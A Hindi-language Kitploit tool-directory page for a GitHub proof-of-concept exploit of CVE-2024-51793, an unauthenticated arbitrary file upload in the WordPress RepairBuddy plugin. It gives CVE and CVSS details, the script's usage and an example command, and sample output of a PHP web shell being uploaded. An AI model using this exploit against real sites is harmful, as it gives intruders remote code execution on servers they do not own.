Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-51793 — वर्डप्रेस RepairBuddy प्लगइन <= 3.8115 - मनमानी फ़ाइल अपलोड भेद्यता | Kitploit
उपकरण/GitHubGitHub/nxploited/cve-2024-51793
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंग
GitHubnxploited/cve-2024-51793

CVE-2024-51793

वर्डप्रेस RepairBuddy प्लगइन <= 3.8115 - मनमानी फ़ाइल अपलोड भेद्यता

रिपॉजिटरी देखें
111 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

🛡️ WordPress RepairBuddy प्लगइन शोषण

📜 CVE जानकारी

CVE-ID: CVE-2024-51793
प्रकाशित: 2024-11-11
अपडेट: 2024-11-11
शीर्षक: WordPress RepairBuddy प्लगइन <= 3.8115 - मनमाना फ़ाइल अपलोड भेद्यता
विवरण:
Webful Creations Computer Repair Shop में खतरनाक प्रकार के फ़ाइल के अप्रतिबंधित अपलोड की भेद्यता वेब सर्वर पर वेब शेल अपलोड करने की अनुमति देती है। यह समस्या Computer Repair Shop को प्रभावित करती है: n/a से 3.8115 तक।

CWE:

  • CWE-434: खतरनाक प्रकार के फ़ाइल का अप्रतिबंधित अपलोड

CVSS:

  • स्कोर: 10.0 (गंभीर)
  • संस्करण: 3.1
  • वेक्टर स्ट्रिंग: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

📋 विवरण

यह WordPress RepairBuddy प्लगइन संस्करण <= 3.8115 में मनमाना फ़ाइल अपलोड भेद्यता के लिए एक प्रूफ ऑफ कॉन्सेप्ट शोषण है। यह शोषण एक हमलावर को कमजोर सर्वर पर वेब शेल अपलोड करने की अनुमति देता है।

⚙️ आवश्यकताएँ

  • Python 3.x
  • requests लाइब्रेरी (pip install requests)

🚀 उपयोग

root@kitploit:~
usage: 
CVE-2024-51793.py [-h] -u URL [-shell SHELL]

WordPress RepairBuddy plugin <= 3.8115 - Arbitrary File Upload vulnerability # By Nxploited ,Khaled alenazi.

options:
  -h, --help     show this help message and exit
  -u, --url URL  Target URL
  -shell SHELL   Shell code to upload

📖 उदाहरण

root@kitploit:~
python 
CVE-2024-51793.py -u http://target.com/wordpress

📝 आउटपुट

root@kitploit:~
Exploit By : Nxploit Khaled Alenazi,

🎯 The site is vulnerable. Proceeding with the exploit...
Response: "<a href=\"http:\/\/target\/wordpress\/wp-content\/repairbuddy_uploads\/reciepts\/2025_03_23_22_43_50nxploit.php\" target=\"_blank\"><\/a><input type=\"hidden\" name=\"repairBuddAttachment_file[]\" value=\"http:\/\/target\/wordpress\/wp-content\/repairbuddy_uploads\/reciepts\/2025_03_23_22_43_50nxploit.php\" \/>"
✅ Shell uploaded successfully.
🔗 Shell URL: http://target/wordpress/wp-content/repairbuddy_uploads/reciepts/2025_03_23_22_43_50nxploit.php

👨‍💻 लेखक

शोषण द्वारा: Nxploited, Khaled Alenazi

टूल डाउनलोड करें